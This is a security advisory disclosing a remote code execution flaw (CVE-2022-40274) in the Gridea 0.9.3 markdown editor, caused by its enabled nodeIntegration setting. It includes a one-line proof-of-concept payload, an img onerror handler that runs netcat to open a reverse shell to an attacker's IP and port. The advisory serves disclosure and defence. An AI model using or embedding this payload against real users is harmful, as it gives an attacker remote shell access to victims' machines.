Gridea 0.9.3 - RCE via nodeIntegration feature
|Name||Gridea 0.9.3 - RCE via nodeIntegration feature|
|Affected versions||Version 0.9.3|
|Kind||Remote command execution|
|Rule||004. Remote command execution|
|CVSSv3 Base Score||8.6|
Gridea version 0.9.3 allows an external attacker to execute arbitrary code remotely on any client attempting to view a malicious markdown file through Gridea. This is possible because the application has the "nodeIntegration" option enabled.
This vulnerability occurs because the application has the "nodeIntegration" option enabled. Due to the above, an attacker can embed malicious JS code in a markdown file and send it to the victim for viewing to achieve an RCE.
To exploit this vulnerability, you must send the following file to a user to open with Gridea. The exploit is triggered when the user presses "CTRL+P" or simply clicks "preview".
<img src=1 onerror="require('child_process').exec('nc 192.168.20.38 4444 -e /bin/bash');"/>
Evidence of exploitation
Our security police
We have reserved the CVE-2022-40274 to refer to this issue from now on.
Version: Gridea 0.9.3
Operating System: GNU/Linux
There is currently no patch available for this vulnerability.
The vulnerability was discovered by Carlos
Bello from the Offensive
Vendor page https://github.com/getgridea/gridea